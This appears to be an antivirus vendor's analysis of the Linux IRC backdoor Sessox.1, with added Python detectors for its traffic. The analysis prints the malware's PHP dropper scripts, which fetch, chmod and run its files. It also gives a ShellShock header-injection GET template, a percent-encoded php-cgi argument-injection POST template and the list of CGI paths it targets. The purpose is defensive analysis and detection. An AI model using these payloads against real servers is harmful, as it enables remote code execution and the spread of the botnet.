Linux.BackDoor.Sessox.1

Added to the Dr.Web virus database: 2015-04-08

Virus description added:

A backdoor for Linux that receives commands from cybercriminals through a chat server that supports the IRC (Internet Relay Chat) protocol. Once the Trojan is launched on the infected computer, it registers itself for autorun using the “/etc/init.d/rc.local” file or, if there is no file with that name, the “/etc/rc.conf” file. Then it reads the contents of its executable file “/tmp/Help1”, encodes it with the base64 algorithm, and saves the result to the file “/tmp/Help1.z”. After that, it performs the same actions for the “/tmp/Help2” and “/tmp/Help2.z” files. Finally, the Trojan establishes a connection with the command and control server and sends it the following request:

PASS %pass%\nNICK %nick%\nUSER %user% localhost localhost :%uptime%\n

where %pass% is "44", and %nick%, %user% and %uptime% stand for strings created using the following method:

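#include <stdlib.h>      /* malloc, rand */
#include <string.h>      /* memset */
#include <sys/sysinfo.h> /* sysinfo, struct sysinfo */

/* Decompiled routine: builds a 20-character "mumu-..." string with an uptime tag. */
char *GetUptime()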
{
  char *szUptime;
  signed int i;
  struct sysinfo info;
 
  szUptime = (char *)malloc(0x15u);
  i = 0;
  memset(szUptime, 0, 0x15u);
  do
    szUptime[i++] = rand() % 26 + 'A';
  while ( i < 20 );
  *szUptime = 'm';
  szUptime[1] = 'u';
  szUptime[2] = 'm';
  szUptime[3] = 'u';
  szUptime[4] = '-';
  sysinfo(&info);
  if ( info.uptime > 0xD2F00 )
  {
    szUptime[5] = '[';
    szUptime[6] = '1';
    szUptime[7] = '0';
    szUptime[8] = ']';
    szUptime[9] = '-';
    if ( info.uptime > 0x1A5E00 )
    {
      szUptime[6] = '2';
      if ( info.uptime > 0x278D00 )
      {
        szUptime[6] = '3';
        if ( info.uptime > 0x34BC00 )
        {
          szUptime[6] = '4';
          if ( info.uptime > 0x41EB00 )
          {
            szUptime[6] = '5';
            if ( info.uptime > 0x4F1A00 )
            {
              szUptime[6] = '6';
              if ( info.uptime > 0x5C4900 )
              {
                szUptime[6] = '7';
                if ( info.uptime > 0x697800 )
                {
                  szUptime[6] = '8';
                  if ( info.uptime > 0x76A700 )
                  {
                    szUptime[6] = '9';
                    if ( info.uptime > 0x83D600 )
                    {
                      szUptime[6] = '1';
                      szUptime[8] = '0';
                      szUptime[9] = ']';
                      szUptime[10] = '-';
                      if ( info.uptime > 0xC5C100 )
                      {
                        szUptime[7] = '5';
                        if ( info.uptime > 0x107AC00 )
                        {
                          szUptime[6] = '2';
                          szUptime[7] = '0';
                          if ( info.uptime > 0x18B8200 )
                          {
                            szUptime[6] = '3';
                            if ( info.uptime > 0x20F5800 )
                            {
                              szUptime[6] = '4';
                              if ( info.uptime > 0x2932E00 )
                                szUptime[6] = '5';
                            }
                          }
                        }
                      }
                    }
                  }
                }
              }
            }
          }
        }
      }
    }
  }
  return szUptime;
}
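
Read against a day of 86400 seconds, the thresholds in the routine above are uptimes of 10 to 90 days in steps of ten, then 100, 150, 200, 300, 400 and 500 days, so the string is always 20 characters: "mumu-", an optional bracketed day tag, and random capital letters. The following detection sketch is an added example, not code from the Trojan or from Dr.Web; its function names and sample sessions are constructed for illustration.

```python
import re

# Layout built by GetUptime(): 20 characters, "mumu-" prefix, an optional
# "[NN]-" or "[NNN]-" uptime tag, and random 'A'-'Z' filling the rest.
NICK_RE = re.compile(r"^mumu-(?:\[(\d{2,3})\]-)?[A-Z]+$")
# Day tags the routine can emit; each threshold is a multiple of 86400 s
# (0xD2F00 = 864000 s = 10 days ... 0x2932E00 = 43200000 s = 500 days).
VALID_TAGS = {10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 150, 200, 300, 400, 500}


def classify_nick(nick):
    """Return the uptime tag in days (0 = untagged), or None if no match."""
    m = NICK_RE.match(nick)
    if m is None or len(nick) != 20:
        return None
    if m.group(1) is None:
        return 0
    days = int(m.group(1))
    return days if days in VALID_TAGS else None


def scan_registration(payload):
    """Check one client-to-server IRC registration burst (PASS/NICK/USER)."""
    fields = {}
    for line in payload.replace("\r", "").split("\n"):
        verb, _, rest = line.partition(" ")
        if verb in ("PASS", "NICK", "USER"):
            fields[verb] = rest
    days = classify_nick(fields.get("NICK", ""))
    user = fields.get("USER", "").split(" ")
    match = (days is not None
             and fields.get("PASS") == "44"
             and user[1:3] == ["localhost", "localhost"])
    return {"match": match, "nick": fields.get("NICK"), "uptime_tag_days": days}


# Constructed sample sessions (not captured traffic).
SAMPLE_BOT = ("PASS 44\nNICK mumu-[150]-QWERTYUIO\n"
              "USER mumu-[150]-ASDFGHJKL localhost localhost :mumu-[150]-ZXCVBNMLK\n")
SAMPLE_USER = "NICK alice\nUSER alice 0 * :Alice Example\n"

if __name__ == "__main__":
    print(scan_registration(SAMPLE_BOT))
    print(scan_registration(SAMPLE_USER))
```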

The Trojan can execute the following commands:

| Command | Meaning |
|---|---|
| 376 | Specify the mode and log in the IRC channel |
| 433 | Forward the information about the computer’s working time (uptime) to the IRC channel |
| 422 | Specify the mode and log in the IRC channel |
| PING | Send the PONG reply |
| NICK | Change the nickname to the one specified in the command |
| PRIVMSG | Execute one of the special functions (see below) |

Special functions:

| Command | Meaning |
|---|---|
| PHPSCAN | Start a PHP scripts’ scan (PHP Scanner) |
| SOCKS5 | Start the proxy server (SOCKS5 Proxy) |
| SSSCAN | Start scanning for the ShellShock vulnerability (ShellShock Scanner) |
| WEBDOS | Launch an attack on the specified website using repeating GET requests (HTTP Flooder) |

By sending repeated GET requests to the website specified by the criminals, the Trojan can launch an attack. Moreover, upon the criminals’ command, Linux.BackDoor.Sessox.1 can scan the attacked server for the ShellShock vulnerability, which allows arbitrary code to be executed on the server. The Trojan has a list of files that can be used in the GET request:

/cgi-sys/entropysearch.cgi
/cgi-sys/defaultwebpage.cgi
/cgi-mod/index.cgi
/cgi-bin/test.cgi
/cgi-bin-sdb/printenv
/admin.cgi
/cgi-bin/bash
/cgi-bin/hello
/cgi-bin/helpme
/cgi-bin/info.sh
/cgi-bin/php5-cli?
/cgi-bin/php5?
/cgi-bin/test-cgi
/cgi-bin/test.sh
/cgi-sys/guestbook.cgi
/cgi-sys/php5?
/phppath/cgi_wrapper?
/phppath/php?
/tmUnblock.cgi
/cgi-bin/contact.cgi
/cgi-bin/defaultwebpage.cgi
/cgi-bin/env.cgi
/cgi-bin/forum.cgi
/cgi-bin/hello.cgi
/cgi-bin/index.cgi
/cgi-bin/login.cgi
/cgi-bin/main.cgi
/cgi-bin/meme.cgi
/cgi-bin/recent.cgi
/cgi-bin/sat-ir-web.pl
/cgi-bin/signon.cgi
/cgi-bin/test-cgi.pl
/cgi-bin/tools/tools.pl
/phppath/cgi_wrapper
/phppath/php
/cgi-sys/FormMail-clone.cgi
/xul/
/gitweb/
/gitweb.cgi
/cgi-bin/
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php4
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/firmwarecfg
/cgi-bin/%2f/admin.html
/cgi-bin/admin.html
/sys-cgi
/cgi-bin/tree.php
/cgi-bin/w3mman2html.cgi
/cgi-bin/status/status.cgi

As a payload, the following script is used in the requests:

$a = \"%s\";
$b = \"%s\";
$c = sys_get_temp_dir();
$d = \"%s\";
$e = \"%s\";
$f = \"chmod 777\";
$g = \"file_put_contents\";
$h = \"system\";
$i = \"file_exists\";
$j = \"fopen\";
if ($i($c . \"/$d\"))
{
     exit(1);
}else{
     echo($c);
     $g(\"$c/$d\", $j(\"$a\", \"r\"));
     $g(\"$c/$e\", $j(\"$b\", \"r\"));
     $h(\"$f \" . $c .\"/$d\");
     $h(\"$f \" . $c .\"/$e\");
     $h($c . \"/$d\");
     $h($c . \"/$e\");
}

In the script, the links to the Trojan’s downloadable files are assigned to the a and b variables, and the names under which these files must be saved are assigned to the d and e variables.

On the basis of these data, the following GET request is generated:

GET %file% HTTP/1.0\r\nCookie: () { :;} ;echo;/usr/bin/php -r %script%\r\nReferer: () { :;} ;echo;/usr/local/bin/php -r %script%\r\n\r\n

where %file% stands for one file from the list given above and %script% stands for the script specified above. For the host that receives GET requests, a random IP address is generated.

Using specifically created POST requests, the malware can execute a scan of PHP scripts to launch a third-party script on the compromised server. For the recipient host, a randomly generated IP address is chosen. To create the POST request, the following script is used:

<?php
$bufferf = '%s';
$bufferf2 = '%s';
$a = sys_get_temp_dir();
$b = \"%s\";
$c = \"%s\";
$d = \"chmod 777\";
$e = \"system\";
$f = \"file_put_contents\";
$g = \"base64_decode\";
$h = \"chmod\";\n$i = \"file_exists\";
if ($i($a . \"/$c\"))
{
  exit(1);
}else{
  echo($a);
  $bufferf = $g($bufferf);
  $bufferf2 = $g($bufferf2);
  $f(\"$a/$b\", $bufferf);
  $f(\"$a/$c\", $bufferf2);
  $h ($a.\"/\".$b,0777);
  $e(\"$d \" . $a .\"/$b\");
  $h ($a.\"/\".$c,0777);
  $e(\"$d \" . $a .\"/$c\");
  $e($a . \"/$c\");
  $e($a . \"/$b\");
  exit(1);
}
?>

where the data from the files /tmp/Help1.z and /tmp/Help2.z (the backdoor’s body in base64) is assigned to the bufferf and bufferf2 variables respectively. The “Help1” and “Help2” values are assigned to the b and c variables.

The request can be sent to the following files:

/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php5-cgi
/cgi-bin/php-cgi.bin

Then the script is inserted into the POST request:

POST %file%?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%67%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%6E HTTP/1.1\r\nHost: %ip%\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %len%\r\nConnection: close\r\n\r\n%script%

where %file% stands for the file from the above list, %ip% stands for the random IP address, %len% stands for the size of the script, %script% stands for the script described above.
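
Both request templates above leave fixed text on the wire that a web server or proxy can match on. The following is an added detection example, not code from the Trojan or from Dr.Web; it covers the GET template's header prefix and the POST template's percent-encoded query string, and its function names and sample requests are constructed. It assumes the doubled %% in the POST template is a printf-style escape for a single %.

```python
import re
from urllib.parse import unquote

# "() {" opens a bash function definition; the GET template above places it
# at the start of the Cookie and Referer header values.
FUNC_DEF_RE = re.compile(r"\(\)\s*\{")
# Covers the CGI interpreter paths listed above as POST targets.
PHP_CGI_RE = re.compile(r"^/cgi-bin/php5?(-cgi(\.bin)?)?$")

def parse_request(raw):
    """Split a raw HTTP request head into (path, query, headers)."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        raise ValueError("malformed request line")
    path, _, query = parts[1].partition("?")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return path, query, headers

def inspect(raw):
    """Return a list of findings for one request (empty list = nothing flagged)."""
    path, query, headers = parse_request(raw)
    findings = ["function definition in header: " + name
                for name, value in headers.items() if FUNC_DEF_RE.search(value)]
    # Assumption: the template's "%%" is a printf escape, so the wire carries
    # a single "%"; match only after percent-decoding and "+" -> space.
    args = unquote(query.replace("+", " "))
    if PHP_CGI_RE.match(path) and args.lstrip().startswith("-"):
        findings.append("interpreter switches in php-cgi query string")
    if "auto_prepend_file=php://input" in args:
        findings.append("auto_prepend_file=php://input override")
    return findings

# Constructed sample requests (SCRIPT, BODY and the hosts are placeholders).
SAMPLE_GET = ("GET /cgi-bin/test.cgi HTTP/1.0\r\n"
              "Cookie: () { :;} ;echo;/usr/bin/php -r SCRIPT\r\n"
              "Referer: () { :;} ;echo;/usr/local/bin/php -r SCRIPT\r\n\r\n")
SAMPLE_POST = ("POST /cgi-bin/php5?%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64"
               "%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1\r\n"
               "Host: 192.0.2.10\r\nConnection: close\r\n\r\nBODY")
SAMPLE_BENIGN = "GET /index.php?page=2 HTTP/1.1\r\nHost: example.test\r\n\r\n"

if __name__ == "__main__":
    for sample in (SAMPLE_GET, SAMPLE_POST, SAMPLE_BENIGN):
        print(inspect(sample))
```

Decoded, the query string in the page's POST template is a series of `-d` interpreter switches, among them `allow_url_include=on` and `auto_prepend_file=php://input`, which is why the check runs on the decoded form rather than the raw bytes.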

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.
